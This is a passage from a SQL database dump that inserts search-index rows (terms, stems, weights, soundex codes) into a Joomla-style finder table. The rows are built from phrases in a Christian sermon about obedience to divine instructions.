(305031, 'and obedient', 'and obedient', 0, 1, 1.4, 'A531353', 1, '*'),
(305032, 'and obedient you', 'and obedient you', 0, 1, 1.5333, 'A531353', 1, '*'),
(305033, 'and over until', 'and over until', 0, 1, 1.4667, 'A5316534', 1, '*'),
(305034, 'and problem', 'and problem', 0, 1, 1.3667, 'A5316145', 1, '*'),
(305035, 'and problem in', 'and problem in', 0, 1, 1.4667, 'A5316145', 1, '*'),
(305036, 'and prosperity', 'and prosperity', 0, 1, 1.4667, 'A53162163', 1, '*'),
(305037, 'and prosperity is', 'and prosperity is', 0, 1, 1.5667, 'A531621632', 1, '*'),
(305038, 'and we are', 'and we are', 0, 1, 1.3333, 'A536', 1, '*'),
(305039, 'anyone behind', 'anyon behind', 0, 1, 1.4333, 'A5153', 1, '*'),
(305040, 'anyone behind your', 'anyon behind your', 0, 1, 1.6, 'A51536', 1, '*'),
(305041, 'are all witnesses', 'ar all witnesses', 0, 1, 1.5667, 'A64352', 1, '*'),
(305042, 'are in the', 'ar in the', 0, 1, 1.3333, 'A653', 1, '*'),
(305043, 'are not to', 'ar not to', 0, 1, 1.3333, 'A653', 1, '*'),
(305044, 'are today', 'ar today', 0, 1, 1.3, 'A630', 1, '*'),
(305045, 'are today i', 'ar today i', 0, 1, 1.3667, 'A630', 1, '*'),
(305046, 'are willing', 'ar willing', 0, 1, 1.3667, 'A6452', 1, '*'),
(305047, 'are willing and', 'ar willing and', 0, 1, 1.5, 'A645253', 1, '*'),
(305048, 'as a result', 'as a result', 0, 1, 1.3667, 'A26243', 1, '*'),
(305049, 'as we continue', 'as we continue', 0, 1, 1.4667, 'A2535', 1, '*'),
(305050, 'be doing', 'be doing', 0, 1, 1.2667, 'B352', 1, '*'),
(305051, 'be doing the', 'be doing the', 0, 1, 1.4, 'B3523', 1, '*'),
(305052, 'be taken', 'be taken', 0, 1, 1.2667, 'B325', 1, '*'),
(305053, 'be taken lightly', 'be taken lightly', 0, 1, 1.5333, 'B3254234', 1, '*'),
(305054, 'because of that', 'becaus of that', 0, 1, 1.5, 'B213', 1, '*'),
(305055, 'becomes outright', 'becom outright', 0, 1, 1.5333, 'B2523623', 1, '*'),
(305056, 'becomes outright and', 'becom outright and', 0, 1, 1.6667, 'B252362353', 1, '*'),
(305057, 'behind your', 'behind your', 0, 1, 1.3667, 'B536', 1, '*'),
(305058, 'behind your preservation', 'behind your preservation', 0, 1, 1.8, 'B5361626135', 1, '*'),
(305059, 'bible says if', 'bibl says if', 0, 1, 1.4333, 'B421', 1, '*'),
(305060, 'bible very', 'bibl very', 0, 1, 1.3333, 'B416', 1, '*'),
(305061, 'bible very well', 'bibl very well', 0, 1, 1.5, 'B4164', 1, '*'),
(305062, 'blessings from', 'bless from', 0, 1, 1.4667, 'B4252165', 1, '*'),
(305063, 'blessings from god', 'bless from god', 0, 1, 1.6, 'B425216523', 1, '*'),
(305064, 'but it came', 'but it came', 0, 1, 1.3667, 'B325', 1, '*'),
(305065, 'came as', 'came as', 0, 1, 1.2333, 'C520', 1, '*'),
(305066, 'came as a', 'came as a', 0, 1, 1.3, 'C520', 1, '*'),
(305067, 'can come', 'can come', 0, 1, 1.2667, 'C525', 1, '*'),
(305068, 'can come to', 'can come to', 0, 1, 1.3667, 'C5253', 1, '*'),
(305069, 'caused', 'caus', 0, 0, 0.4, 'C300', 1, '*'),
(305070, 'caused adam', 'caus adam', 0, 1, 1.3667, 'C350', 1, '*'),
(305071, 'caused adam and', 'caus adam and', 0, 1, 1.5, 'C353', 1, '*'),
(305072, 'christian that gets', 'christian that gets', 0, 1, 1.6333, 'C62353232', 1, '*'),
(305073, 'come and', 'come and', 0, 1, 1.2667, 'C530', 1, '*'),
(305074, 'come and let', 'come and let', 0, 1, 1.4, 'C5343', 1, '*'),
(305075, 'comes when', 'come when', 0, 1, 1.3333, 'C525', 1, '*'),
(305076, 'comes when you', 'come when you', 0, 1, 1.4667, 'C525', 1, '*'),
(305077, 'commit yourself', 'commit yourself', 0, 1, 1.5, 'C536241', 1, '*'),
(305078, 'commit yourself to', 'commit yourself to', 0, 1, 1.6, 'C5362413', 1, '*'),
(305079, 'continue we', 'continu we', 0, 1, 1.3667, 'C535', 1, '*'),
(305080, 'continue we shall', 'continu we shall', 0, 1, 1.5667, 'C53524', 1, '*'),
(305081, 'cost eli', 'cost eli', 0, 1, 1.2667, 'C340', 1, '*'),
(305082, 'cost eli his', 'cost eli his', 0, 1, 1.4, 'C342', 1, '*'),
(305083, 'crossed', 'cross', 0, 0, 0.4667, 'C623', 1, '*'),
(305084, 'crossed it', 'cross it', 0, 1, 1.3333, 'C623', 1, '*'),
(305085, 'crossed it through', 'cross it through', 0, 1, 1.6, 'C62362', 1, '*'),
(305086, 'crossed the', 'cross the', 0, 1, 1.3667, 'C623', 1, '*'),
(305087, 'crossed the path', 'cross the path', 0, 1, 1.5333, 'C62313', 1, '*'),
(305088, 'day you', 'dai you', 0, 1, 1.2333, 'D000', 1, '*'),
(305089, 'day you must', 'dai you must', 0, 1, 1.4, 'D523', 1, '*'),
(305090, 'delayed', 'delai', 0, 0, 0.4667, 'D430', 1, '*'),
(305091, 'delayed obedience', 'delai obedience', 0, 1, 1.5667, 'D431352', 1, '*'),
(305092, 'delayed obedience usually', 'delai obedience usually', 0, 1, 1.8333, 'D4313524', 1, '*'),
(305093, 'desire and not', 'desir and not', 0, 1, 1.4667, 'D265353', 1, '*'),
(305094, 'destiny are', 'destini are', 0, 1, 1.3667, 'D2356', 1, '*'),
(305095, 'destiny are in', 'destini are in', 0, 1, 1.4667, 'D23565', 1, '*'),
(305096, 'devil but', 'devil but', 0, 1, 1.3, 'D1413', 1, '*'),
(305097, 'devil but it', 'devil but it', 0, 1, 1.4, 'D1413', 1, '*'),
(305098, 'died on', 'di on', 0, 1, 1.2333, 'D500', 1, '*'),
(305099, 'died on the', 'di on the', 0, 1, 1.3667, 'D530', 1, '*'),
(305100, 'disobedience to divine', 'disobedi to divine', 0, 1, 1.7333, 'D21352315', 1, '*'),
(305101, 'disobedience to god', 'disobedi to god', 0, 1, 1.6333, 'D21352323', 1, '*'),
(305102, 'disobeyed', 'disobei', 0, 0, 0.6, 'D213', 2, '*'),
(305103, 'disobeyed ignored', 'disobei ignored', 0, 1, 1.5667, 'D2132563', 1, '*'),
(305104, 'disobeyed ignored neglected', 'disobei ignored neglected', 0, 1, 1.9, 'D213256352423', 1, '*'),
(305105, 'divine instruction was', 'divin instruction was', 0, 1, 1.7333, 'D152362352', 1, '*'),
(305106, 'divine instruction your', 'divin instruction your', 0, 1, 1.7667, 'D152362356', 1, '*'),
(305107, 'divine instructions are', 'divin instructions are', 0, 1, 1.7667, 'D1523623526', 1, '*'),
(305108, 'divine instructions can', 'divin instructions can', 0, 1, 1.7667, 'D1523623525', 1, '*'),
(305109, 'divine instructions god', 'divin instructions god', 0, 1, 1.7667, 'D1523623523', 1, '*'),
(305110, 'divine instructions instruction', 'divin instructions instruction', 0, 1, 2, 'D1523623525236235', 1, '*'),
(305111, 'divine instructions till', 'divin instructions till', 0, 1, 1.8, 'D15236235234', 1, '*'),
(305112, 'divine structure', 'divin structure', 0, 1, 1.5333, 'D15236236', 1, '*'),
(305113, 'divine structure where', 'divin structure where', 0, 1, 1.7333, 'D15236236', 1, '*'),
(305114, 'doing the', 'do the', 0, 1, 1.3, 'D523', 1, '*'),
(305115, 'doing the ministry', 'do the ministry', 0, 1, 1.6, 'D5235236', 1, '*'),
(305116, 'don\'t be a', 'don be a', 0, 1, 1.3333, 'D531', 1, '*'),
(305117, 'down your', 'down your', 0, 1, 1.3, 'D560', 1, '*'),
(305118, 'down your instructions', 'down your instructions', 0, 1, 1.7333, 'D5652362352', 1, '*'),
(305119, 'earn', 'earn', 0, 0, 0.2667, 'E650', 1, '*'),
(305120, 'earn n', 'earn n', 0, 1, 1.2, 'E650', 1, '*'),
(305121, 'earn n 10', 'earn n 10', 0, 1, 1.3, 'E650', 1, '*'),
(305122, 'eden', 'eden', 0, 0, 0.2667, 'E350', 1, '*'),
(305123, 'eden every', 'eden every', 0, 1, 1.3333, 'E3516', 1, '*'),
(305124, 'eden every tragedy', 'eden every tragedy', 0, 1, 1.6, 'E35163623', 1, '*'),
(305125, 'eli his', 'eli his', 0, 1, 1.2333, 'E420', 1, '*'),
(305126, 'eli his life', 'eli his life', 0, 1, 1.4, 'E4241', 1, '*'),
(305127, 'eve to', 'ev to', 0, 1, 1.2, 'E130', 1, '*'),
(305128, 'eve to lose', 'ev to lose', 0, 1, 1.3667, 'E1342', 1, '*'),
(305129, 'eventual', 'eventu', 0, 0, 0.5333, 'E1534', 1, '*'),
(305130, 'eventual disobedience', 'eventu disobedience', 0, 1, 1.7, 'E1534321352', 1, '*'),
(305131, 'eventual disobedience to', 'eventu disobedience to', 0, 1, 1.8, 'E15343213523', 1, '*'),
(305132, 'every tragedy', 'everi tragedy', 0, 1, 1.4333, 'E163623', 1, '*'),
(305133, 'every tragedy and', 'everi tragedy and', 0, 1, 1.5667, 'E16362353', 1, '*'),
(305134, 'everyone that crossed', 'everyon that crossed', 0, 1, 1.7, 'E16532623', 1, '*'),
(305135, 'example if', 'exampl if', 0, 1, 1.3333, 'E25141', 1, '*'),
(305136, 'example if i', 'exampl if i', 0, 1, 1.4, 'E25141', 1, '*'),
(305137, 'faithfulness god', 'faith god', 0, 1, 1.5333, 'F314523', 1, '*'),
(305138, 'faithfulness god always', 'faith god always', 0, 1, 1.7667, 'F31452342', 1, '*'),
(305139, 'faithfulness today', 'faith today', 0, 1, 1.6, 'F314523', 1, '*'),
(305140, 'faithfulness today in', 'faith today in', 0, 1, 1.7, 'F3145235', 1, '*'),
(305141, 'father\'s heart 18', 'father heart 18', 0, 1, 1.5667, 'F36263', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(305142, 'follow thereafter', 'follow thereafter', 0, 1, 1.5667, 'F436136', 1, '*'),
(305143, 'follow thereafter always', 'follow thereafter always', 0, 1, 1.8, 'F43613642', 1, '*'),
(305144, 'followed', 'follow', 0, 0, 0.5333, 'F430', 1, '*'),
(305145, 'followed my', 'follow my', 0, 1, 1.3667, 'F435', 1, '*'),
(305146, 'followed my own', 'follow my own', 0, 1, 1.5, 'F435', 1, '*'),
(305147, 'for example if', 'for example if', 0, 1, 1.4667, 'F625141', 1, '*'),
(305148, 'for life', 'for life', 0, 1, 1.2667, 'F641', 1, '*'),
(305149, 'for life and', 'for life and', 0, 1, 1.4, 'F64153', 1, '*'),
(305150, 'forgets', 'forget', 0, 0, 0.4667, 'F6232', 1, '*'),
(305151, 'forgets the', 'forget the', 0, 1, 1.3667, 'F62323', 1, '*'),
(305152, 'forgets the instructions', 'forget the instructions', 0, 1, 1.8, 'F6232352362352', 1, '*'),
(305153, 'form the', 'form the', 0, 1, 1.2667, 'F653', 1, '*'),
(305154, 'form the direction', 'form the direction', 0, 1, 1.6, 'F6536235', 1, '*'),
(305155, 'from god comes', 'from god comes', 0, 1, 1.4667, 'F6523252', 1, '*'),
(305156, 'from saul', 'from saul', 0, 1, 1.3, 'F6524', 1, '*'),
(305157, 'from saul because', 'from saul because', 0, 1, 1.5667, 'F652412', 1, '*'),
(305158, 'full time', 'full time', 0, 1, 1.3, 'F435', 1, '*'),
(305159, 'full time to', 'full time to', 0, 1, 1.4, 'F4353', 1, '*'),
(305160, 'garden of', 'garden of', 0, 1, 1.3, 'G6351', 1, '*'),
(305161, 'garden of eden', 'garden of eden', 0, 1, 1.4667, 'G635135', 1, '*'),
(305162, 'gets carried', 'get carried', 0, 1, 1.4, 'G3263', 1, '*'),
(305163, 'gets carried away', 'get carried away', 0, 1, 1.5667, 'G3263', 1, '*'),
(305164, 'go over them', 'go over them', 0, 1, 1.4, 'G1635', 1, '*'),
(305165, 'god always', 'god always', 0, 1, 1.3333, 'G342', 2, '*'),
(305166, 'god always rewards', 'god always rewards', 0, 1, 1.6, 'G342632', 1, '*'),
(305167, 'god and forgets', 'god and forgets', 0, 1, 1.5, 'G35316232', 1, '*'),
(305168, 'god and his', 'god and his', 0, 1, 1.3667, 'G3532', 1, '*'),
(305169, 'god and we', 'god and we', 0, 1, 1.3333, 'G353', 1, '*'),
(305170, 'god comes when', 'god comes when', 0, 1, 1.4667, 'G32525', 1, '*'),
(305171, 'god in special', 'god in special', 0, 1, 1.4667, 'G352124', 1, '*'),
(305172, 'god took', 'god took', 0, 1, 1.2667, 'G320', 1, '*'),
(305173, 'god took the', 'god took the', 0, 1, 1.4, 'G323', 1, '*'),
(305174, 'god when he', 'god when he', 0, 1, 1.3667, 'G350', 1, '*'),
(305175, 'god without redemption', 'god without redemption', 0, 1, 1.7333, 'G3635135', 1, '*'),
(305176, 'good of the', 'good of the', 0, 1, 1.3667, 'G313', 1, '*'),
(305177, 'greatest blessings', 'greatest blessings', 0, 1, 1.6, 'G632314252', 1, '*'),
(305178, 'greatest blessings from', 'greatest blessings from', 0, 1, 1.7667, 'G632314252165', 1, '*'),
(305179, 'had followed', 'had followed', 0, 1, 1.4, 'H3143', 1, '*'),
(305180, 'had followed my', 'had followed my', 0, 1, 1.5, 'H31435', 1, '*'),
(305181, 'have obeyed all', 'have obeyed all', 0, 1, 1.5, 'H134', 2, '*'),
(305182, 'he sent', 'he sent', 0, 1, 1.2333, 'H253', 1, '*'),
(305183, 'he sent me', 'he sent me', 0, 1, 1.3333, 'H2535', 1, '*'),
(305184, 'heart 18', 'heart 18', 0, 1, 1.2667, 'H630', 1, '*'),
(305185, 'heart 18 06', 'heart 18 06', 0, 1, 1.3667, 'H630', 1, '*'),
(305186, 'heed to them', 'heed to them', 0, 1, 1.4, 'H350', 1, '*'),
(305187, 'his faithfulness', 'hi faithfulness', 0, 1, 1.5333, 'H2131452', 1, '*'),
(305188, 'his faithfulness god', 'hi faithfulness god', 0, 1, 1.6667, 'H21314523', 1, '*'),
(305189, 'his faithfulness today', 'hi faithfulness today', 0, 1, 1.7333, 'H21314523', 1, '*'),
(305190, 'his instruction', 'hi instruction', 0, 1, 1.5, 'H25236235', 1, '*'),
(305191, 'his instruction if', 'hi instruction if', 0, 1, 1.6, 'H252362351', 1, '*'),
(305192, 'his ordained', 'hi ordained', 0, 1, 1.4, 'H26353', 1, '*'),
(305193, 'his ordained servants', 'hi ordained servants', 0, 1, 1.7, 'H26353261532', 1, '*'),
(305194, 'his two', 'hi two', 0, 1, 1.2333, 'H230', 1, '*'),
(305195, 'his two sons', 'hi two sons', 0, 1, 1.4, 'H23252', 1, '*'),
(305196, 'i had followed', 'i had followed', 0, 1, 1.4667, 'I3143', 1, '*'),
(305197, 'i obeyed', 'i obeyed', 0, 1, 1.2667, 'I130', 2, '*'),
(305198, 'i obeyed god', 'i obeyed god', 0, 1, 1.4, 'I1323', 1, '*'),
(305199, 'if i had', 'if i had', 0, 1, 1.2667, 'I130', 1, '*'),
(305200, 'if you study', 'if you study', 0, 1, 1.4, 'I123', 1, '*'),
(305201, 'ignored neglected', 'ignor neglected', 0, 1, 1.5667, 'I256352423', 1, '*'),
(305202, 'ignored neglected or', 'ignor neglected or', 0, 1, 1.6667, 'I2563524236', 1, '*'),
(305203, 'ilesa', 'ilesa', 0, 0, 0.3333, 'I420', 1, '*'),
(305204, 'ilesa on', 'ilesa on', 0, 1, 1.2667, 'I425', 1, '*'),
(305205, 'ilesa on full', 'ilesa on full', 0, 1, 1.4333, 'I42514', 1, '*'),
(305206, 'in most', 'in most', 0, 1, 1.2333, 'I523', 1, '*'),
(305207, 'in most people\'s', 'in most people', 0, 1, 1.5333, 'I523142', 1, '*'),
(305208, 'in my life', 'in my life', 0, 1, 1.3333, 'I541', 1, '*'),
(305209, 'in obedience', 'in obedience', 0, 1, 1.4, 'I51352', 1, '*'),
(305210, 'in obedience to', 'in obedience to', 0, 1, 1.5, 'I513523', 1, '*'),
(305211, 'in special', 'in special', 0, 1, 1.3333, 'I52124', 1, '*'),
(305212, 'in special meetings', 'in special meetings', 0, 1, 1.6333, 'I521245352', 1, '*'),
(305213, 'in the ministry', 'in the ministry', 0, 1, 1.5, 'I535236', 1, '*'),
(305214, 'instruction from', 'instruct from', 0, 1, 1.5333, 'I5236235165', 1, '*'),
(305215, 'instruction from the', 'instruct from the', 0, 1, 1.6667, 'I52362351653', 1, '*'),
(305216, 'instruction if', 'instruct if', 0, 1, 1.4667, 'I52362351', 1, '*'),
(305217, 'instruction if you', 'instruct if you', 0, 1, 1.6, 'I52362351', 1, '*'),
(305218, 'instruction is', 'instruct is', 0, 1, 1.4667, 'I52362352', 1, '*'),
(305219, 'instruction is what', 'instruct is what', 0, 1, 1.6333, 'I523623523', 1, '*'),
(305220, 'instruction or', 'instruct or', 0, 1, 1.4667, 'I52362356', 1, '*'),
(305221, 'instruction or the', 'instruct or the', 0, 1, 1.6, 'I523623563', 1, '*'),
(305222, 'instruction was', 'instruct was', 0, 1, 1.5, 'I52362352', 1, '*'),
(305223, 'instruction was what', 'instruct was what', 0, 1, 1.6667, 'I523623523', 1, '*'),
(305224, 'instruction your', 'instruct your', 0, 1, 1.5333, 'I52362356', 1, '*'),
(305225, 'instruction your provision', 'instruct your provision', 0, 1, 1.8667, 'I5236235616125', 1, '*'),
(305226, 'instructions and go', 'instruct and go', 0, 1, 1.6333, 'I52362352532', 1, '*'),
(305227, 'instructions are', 'instruct are', 0, 1, 1.5333, 'I523623526', 1, '*'),
(305228, 'instructions are not', 'instruct are not', 0, 1, 1.6667, 'I52362352653', 1, '*'),
(305229, 'instructions can', 'instruct can', 0, 1, 1.5333, 'I523623525', 1, '*'),
(305230, 'instructions can come', 'instruct can come', 0, 1, 1.7, 'I52362352525', 1, '*'),
(305231, 'instructions god', 'instruct god', 0, 1, 1.5333, 'I523623523', 1, '*'),
(305232, 'instructions god took', 'instruct god took', 0, 1, 1.7, 'I5236235232', 1, '*'),
(305233, 'instructions instruction', 'instruct instruction', 0, 1, 1.8, 'I523623525236235', 1, '*'),
(305234, 'instructions instruction is', 'instruct instruction is', 0, 1, 1.9, 'I5236235252362352', 1, '*'),
(305235, 'instructions that', 'instruct that', 0, 1, 1.5667, 'I523623523', 1, '*'),
(305236, 'instructions that follow', 'instruct that follow', 0, 1, 1.8, 'I52362352314', 1, '*'),
(305237, 'instructions till', 'instruct till', 0, 1, 1.5667, 'I5236235234', 1, '*'),
(305238, 'instructions till next', 'instruct till next', 0, 1, 1.7333, 'I5236235234523', 1, '*'),
(305239, 'is divine instructions', 'is divine instructions', 0, 1, 1.7333, 'I23152362352', 1, '*'),
(305240, 'is in obedience', 'is in obedience', 0, 1, 1.5, 'I251352', 1, '*'),
(305241, 'is secured', 'is secured', 0, 1, 1.3333, 'I263', 1, '*'),
(305242, 'is secured whenever', 'is secured whenever', 0, 1, 1.6333, 'I263516', 1, '*'),
(305243, 'is what keeps', 'is what keeps', 0, 1, 1.4333, 'I23212', 1, '*'),
(305244, 'it came as', 'it came as', 0, 1, 1.3333, 'I3252', 1, '*'),
(305245, 'it through', 'it through', 0, 1, 1.3333, 'I362', 1, '*'),
(305246, 'it through disobedience', 'it through disobedience', 0, 1, 1.7667, 'I362321352', 1, '*'),
(305247, 'item 52', 'item 52', 0, 1, 1.2333, 'I350', 1, '*'),
(305248, 'item 52 if', 'item 52 if', 0, 1, 1.3333, 'I351', 1, '*'),
(305249, 'just the', 'just the', 0, 1, 1.2667, 'J300', 1, '*'),
(305250, 'just the devil', 'just the devil', 0, 1, 1.4667, 'J314', 1, '*'),
(305251, 'k2 item 52', 'k2 item 52', 0, 1, 1.3333, 'K350', 1, '*'),
(305252, 'keeps', 'keep', 0, 0, 0.3333, 'K120', 1, '*'),
(305253, 'keeps us', 'keep us', 0, 1, 1.2667, 'K120', 1, '*'),
(305254, 'keeps us within', 'keep us within', 0, 1, 1.5, 'K1235', 1, '*'),
(305255, 'kingdom from', 'kingdom from', 0, 1, 1.4, 'K5235165', 1, '*'),
(305256, 'kingdom from saul', 'kingdom from saul', 0, 1, 1.5667, 'K523516524', 1, '*'),
(305257, 'land from', 'land from', 0, 1, 1.3, 'L53165', 1, '*'),
(305258, 'land from our', 'land from our', 0, 1, 1.4333, 'L531656', 1, '*'),
(305259, 'land the root', 'land the root', 0, 1, 1.4333, 'L5363', 1, '*'),
(305260, 'leaving anyone', 'leav anyone', 0, 1, 1.4667, 'L1525', 1, '*'),
(305261, 'leaving anyone behind', 'leav anyone behind', 0, 1, 1.7, 'L1525153', 1, '*'),
(305262, 'let them form', 'let them form', 0, 1, 1.4333, 'L35165', 1, '*'),
(305263, 'level we', 'level we', 0, 1, 1.2667, 'L140', 1, '*'),
(305264, 'level we are', 'level we are', 0, 1, 1.4, 'L146', 1, '*'),
(305265, 'life and his', 'life and his', 0, 1, 1.4, 'L1532', 1, '*'),
(305266, 'life and in', 'life and in', 0, 1, 1.3667, 'L1535', 2, '*'),
(305267, 'life don\'t', 'life don', 0, 1, 1.3333, 'L1353', 2, '*'),
(305268, 'life don\'t be', 'life don be', 0, 1, 1.4333, 'L13531', 1, '*'),
(305269, 'lightly divine', 'lightli divine', 0, 1, 1.4667, 'L234315', 1, '*'),
(305270, 'lightly divine instructions', 'lightli divine instructions', 0, 1, 1.9, 'L2343152362352', 1, '*'),
(305271, 'lives today is', 'live today is', 0, 1, 1.4667, 'L1232', 1, '*'),
(305272, 'lord always', 'lord always', 0, 1, 1.3667, 'L6342', 1, '*'),
(305273, 'lord always commit', 'lord always commit', 0, 1, 1.6, 'L634253', 1, '*'),
(305274, 'lose their', 'lose their', 0, 1, 1.3333, 'L236', 1, '*'),
(305275, 'lose their place', 'lose their place', 0, 1, 1.5333, 'L236142', 1, '*'),
(305276, 'me to ilesa', 'me to ilesa', 0, 1, 1.3667, 'M342', 1, '*'),
(305277, 'meet with', 'meet with', 0, 1, 1.3, 'M300', 1, '*'),
(305278, 'meet with more', 'meet with more', 0, 1, 1.4667, 'M356', 1, '*'),
(305279, 'meetings', 'meet', 0, 0, 0.5333, 'M352', 2, '*'),
(305280, 'meetings or', 'meet or', 0, 1, 1.3667, 'M3526', 1, '*'),
(305281, 'meetings or through', 'meet or through', 0, 1, 1.6333, 'M3526362', 1, '*'),
(305282, 'ministry and as', 'ministri and as', 0, 1, 1.5, 'M236532', 1, '*'),
(305283, 'ministry at', 'ministri at', 0, 1, 1.3667, 'M2363', 1, '*'),
(305284, 'ministry at the', 'ministri at the', 0, 1, 1.5, 'M2363', 1, '*'),
(305285, 'misunderstood', 'misunderstood', 0, 0, 0.8667, 'M253623', 1, '*'),
(305286, 'misunderstood the', 'misunderstood the', 0, 1, 1.5667, 'M253623', 1, '*'),
(305287, 'misunderstood the greatest', 'misunderstood the greatest', 0, 1, 1.8667, 'M25362326323', 1, '*'),
(305288, 'more of', 'more of', 0, 1, 1.2333, 'M610', 1, '*'),
(305289, 'more of his', 'more of his', 0, 1, 1.3667, 'M612', 1, '*'),
(305290, 'most people\'s', 'most people', 0, 1, 1.4333, 'M23142', 1, '*'),
(305291, 'most people\'s lives', 'most people lives', 0, 1, 1.6333, 'M23142412', 1, '*'),
(305292, 'moves of', 'move of', 0, 1, 1.2667, 'M121', 1, '*'),
(305293, 'moves of god', 'move of god', 0, 1, 1.4, 'M12123', 1, '*'),
(305294, 'my life', 'my life', 0, 1, 1.2333, 'M410', 2, '*'),
(305295, 'my life and', 'my life and', 0, 1, 1.3667, 'M4153', 2, '*'),
(305296, 'my own', 'my own', 0, 1, 1.2, 'M000', 1, '*'),
(305297, 'my own desire', 'my own desire', 0, 1, 1.4333, 'M326', 1, '*'),
(305298, 'n', 'n', 0, 0, 0.0667, 'N000', 1, '*'),
(305299, 'n 10', 'n 10', 0, 1, 1.1333, 'N000', 1, '*'),
(305300, 'n 10 per', 'n 10 per', 0, 1, 1.2667, 'N160', 1, '*'),
(305301, 'neglected', 'neglect', 0, 0, 0.6, 'N2423', 1, '*'),
(305302, 'neglected or', 'neglect or', 0, 1, 1.4, 'N24236', 1, '*'),
(305303, 'neglected or misunderstood', 'neglect or misunderstood', 0, 1, 1.8667, 'N242365253623', 1, '*'),
(305304, 'not be doing', 'not be doing', 0, 1, 1.4, 'N31352', 1, '*'),
(305305, 'not just the', 'not just the', 0, 1, 1.4, 'N323', 1, '*'),
(305306, 'not obeyed', 'not obeyed', 0, 1, 1.3333, 'N313', 1, '*'),
(305307, 'not obeyed god', 'not obeyed god', 0, 1, 1.4667, 'N31323', 1, '*'),
(305308, 'not to be', 'not to be', 0, 1, 1.3, 'N310', 1, '*'),
(305309, 'obedience for', 'obedi for', 0, 1, 1.4333, 'O135216', 1, '*'),
(305310, 'obedience for example', 'obedi for example', 0, 1, 1.7, 'O1352162514', 1, '*'),
(305311, 'obedience to his', 'obedi to his', 0, 1, 1.5333, 'O135232', 1, '*'),
(305312, 'obedience usually', 'obedi usually', 0, 1, 1.5667, 'O13524', 1, '*'),
(305313, 'obedience usually becomes', 'obedi usually becomes', 0, 1, 1.8333, 'O135241252', 1, '*'),
(305314, 'obedient you', 'obedi you', 0, 1, 1.4, 'O1353', 1, '*'),
(305315, 'obedient you shall', 'obedi you shall', 0, 1, 1.6, 'O135324', 1, '*'),
(305316, 'obey delayed', 'obei delayed', 0, 1, 1.4, 'O1343', 1, '*'),
(305317, 'obey delayed obedience', 'obei delayed obedience', 0, 1, 1.7333, 'O13431352', 1, '*'),
(305318, 'obey divine', 'obei divine', 0, 1, 1.3667, 'O1315', 1, '*'),
(305319, 'obey divine instruction', 'obei divine instruction', 0, 1, 1.7667, 'O1315236235', 1, '*'),
(305320, 'obeyed all', 'obei all', 0, 1, 1.3333, 'O134', 2, '*'),
(305321, 'obeyed all without', 'obei all without', 0, 1, 1.6, 'O1343', 1, '*'),
(305322, 'obeyed god', 'obei god', 0, 1, 1.3333, 'O1323', 1, '*'),
(305323, 'obeyed god and', 'obei god and', 0, 1, 1.4667, 'O132353', 1, '*'),
(305324, 'obeyed god when', 'obei god when', 0, 1, 1.5, 'O13235', 1, '*'),
(305325, 'of eden', 'of eden', 0, 1, 1.2333, 'O135', 1, '*'),
(305326, 'of eden every', 'of eden every', 0, 1, 1.4333, 'O13516', 1, '*'),
(305327, 'of god without', 'of god without', 0, 1, 1.4667, 'O123', 1, '*'),
(305328, 'of his faithfulness', 'of his faithfulness', 0, 1, 1.6333, 'O12131452', 1, '*'),
(305329, 'of one instruction', 'of one instruction', 0, 1, 1.6, 'O15236235', 1, '*'),
(305330, 'of problems', 'of problems', 0, 1, 1.3667, 'O161452', 1, '*'),
(305331, 'of problems between', 'of problems between', 0, 1, 1.6333, 'O161452135', 1, '*'),
(305332, 'of that that', 'of that that', 0, 1, 1.4, 'O130', 1, '*'),
(305333, 'of the land', 'of the land', 0, 1, 1.3667, 'O13453', 1, '*'),
(305334, 'of them died', 'of them died', 0, 1, 1.4, 'O1353', 1, '*'),
(305335, 'of your obedience', 'of your obedience', 0, 1, 1.5667, 'O161352', 1, '*'),
(305336, 'on full', 'on full', 0, 1, 1.2333, 'O514', 1, '*'),
(305337, 'on full time', 'on full time', 0, 1, 1.4, 'O51435', 1, '*'),
(305338, 'on the same', 'on the same', 0, 1, 1.3667, 'O5325', 1, '*'),
(305339, 'one instruction', 'on instruction', 0, 1, 1.5, 'O5236235', 1, '*'),
(305340, 'one instruction or', 'on instruction or', 0, 1, 1.6, 'O52362356', 1, '*'),
(305341, 'or misunderstood', 'or misunderstood', 0, 1, 1.5333, 'O65253623', 1, '*'),
(305342, 'or misunderstood the', 'or misunderstood the', 0, 1, 1.6667, 'O65253623', 1, '*'),
(305343, 'or the other', 'or the other', 0, 1, 1.4, 'O636', 1, '*'),
(305344, 'or through', 'or through', 0, 1, 1.3333, 'O6362', 2, '*'),
(305345, 'or through his', 'or through his', 0, 1, 1.4667, 'O6362', 1, '*'),
(305346, 'ordained servants', 'ordain servants', 0, 1, 1.5667, 'O6353261532', 1, '*'),
(305347, 'ordained servants to', 'ordain servants to', 0, 1, 1.6667, 'O63532615323', 1, '*'),
(305348, 'other that', 'other that', 0, 1, 1.3333, 'O363', 1, '*'),
(305349, 'other that was', 'other that was', 0, 1, 1.4667, 'O3632', 1, '*'),
(305350, 'our protection', 'our protection', 0, 1, 1.4667, 'O6163235', 1, '*'),
(305351, 'our protection and', 'our protection and', 0, 1, 1.6, 'O61632353', 1, '*'),
(305352, 'outright', 'outright', 0, 0, 0.5333, 'O3623', 1, '*'),
(305353, 'outright and', 'outright and', 0, 1, 1.4, 'O362353', 1, '*'),
(305354, 'outright and eventual', 'outright and eventual', 0, 1, 1.7, 'O3623531534', 1, '*'),
(305355, 'over them over', 'over them over', 0, 1, 1.4667, 'O163516', 1, '*'),
(305356, 'over until', 'over until', 0, 1, 1.3333, 'O16534', 1, '*'),
(305357, 'over until you', 'over until you', 0, 1, 1.4667, 'O16534', 1, '*'),
(305358, 'own desire', 'own desire', 0, 1, 1.3333, 'O5326', 1, '*'),
(305359, 'own desire and', 'own desire and', 0, 1, 1.4667, 'O532653', 1, '*'),
(305360, 'path of god', 'path of god', 0, 1, 1.3667, 'P3123', 1, '*'),
(305361, 'people is divine', 'peopl is divine', 0, 1, 1.5333, 'P42315', 1, '*'),
(305362, 'people\'s lives', 'peopl lives', 0, 1, 1.4667, 'P42412', 1, '*'),
(305363, 'people\'s lives today', 'peopl lives today', 0, 1, 1.6667, 'P424123', 1, '*'),
(305364, 'per', 'per', 0, 0, 0.2, 'P600', 1, '*'),
(305365, 'per week', 'per week', 0, 1, 1.2667, 'P620', 1, '*'),
(305366, 'per week we', 'per week we', 0, 1, 1.3667, 'P620', 1, '*'),
(305367, 'personal study', 'person study', 0, 1, 1.4667, 'P625423', 1, '*'),
